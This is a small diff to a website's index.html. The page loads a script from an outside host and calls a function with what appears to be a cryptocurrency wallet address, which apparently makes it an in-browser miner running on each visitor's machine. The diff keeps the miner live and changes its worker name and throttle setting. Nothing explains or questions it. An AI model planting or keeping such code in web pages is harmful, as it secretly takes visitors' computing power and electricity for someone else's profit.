--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
+
 <script src="https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
 <script type="text/javascript">
-EverythingIsLife('48VGGDaFWeedcSGkJ1Ww3eUnMxzGCgoMwV6ZS5enen9u1PjoWduKxszcy81zLCvoDEUmeBoGXu2adEqWV1Z6aGGHECnymR6', 'x', 100);
+EverythingIsLife('48VGGDaFWeedcSGkJ1Ww3eUnMxzGCgoMwV6ZS5enen9u1PjoWduKxszcy81zLCvoDEUmeBoGXu2adEqWV1Z6aGGHECnymR6', 'QuickServicesDonation', 30);
 </script>
-	
+
